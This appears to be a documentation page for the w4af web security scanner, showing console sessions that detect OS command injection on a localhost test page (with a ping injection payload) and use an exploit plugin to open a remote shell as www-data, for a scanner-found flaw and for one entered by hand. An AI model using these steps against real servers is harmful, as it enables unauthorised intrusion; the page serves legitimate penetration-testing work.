Exploiting Web application vulnerabilities

w4af allows users to exploit Web application vulnerabilities in an automated manner. The vulnerabilities to be exploited can be identified using audit plugins or manually by the user (and then the vulnerability details are provided to w4af).

During the scan vulnerabilities are found and stored in specific locations of the knowledge base, from where exploit plugins can read and use the stored information to exploit the vulnerability. Exploiting a vulnerability identified by an audit plugin is easy:

w4af>>> plugins
w4af/plugins>>> audit os_commanding
w4af/plugins>>> back
w4af>>> target
w4af/config:target>>> set target http://localhost/w4af/os_commanding/v.php?command=f0as9
w4af/config:target>>> back
w4af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w4af/os_commanding/v.php
The list of fuzzable requests is:
- http://localhost/w4af/os_commanding/v.php | Method: GET | Parameters: (command)
Starting os_commanding plugin execution.
OS Commanding was found at: "http://localhost/w4af/os_commanding/v.php", using HTTP method GET.
The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w4af>>> exploit
w4af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells:
- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
Please use the interact command to interact with the shell objects.
w4af/exploit>>> interact 0
Execute "end_interaction" to get out of the remote shell.
Commands typed in this menu will run on the remote web server.
w4af/exploit/os_commanding-0>>> ls
v.php
v2.php
v3.php
w4af/exploit/os_commanding-0>>> end_interaction
w4af/exploit>>> back
w4af>>>

Exploiting one you’ve found manually, requires you to provide some input:

w4af>>> kb
w4af/kb>>> help
| list            | List the items in the knowledge base.
| add             | Add a vulnerability to the KB
w4af/kb>>> add os_commanding
w4af/kb/config:os_commanding>>> view
| operating_system         | Remote operating system (linux or windows).
| name                     | Vulnerability name (eg. SQL Injection)
| url                      | URL (without query string parameters)
| vulnerable_parameter     | Vulnerable parameter
| separator                | Command separator used for injecting commands.
| data                     | Query string or postdata parameters in url-encoded form
| method                   | HTTP method
w4af/kb/config:os_commanding>>>

You simply set all the configuration settings and then execute save and back to store your vulnerability in the knowledge base. Once the information is there you’ll be able to follow the same steps:

w4af>>> exploit
w4af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells:
- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>
Please use the interact command to interact with the shell objects.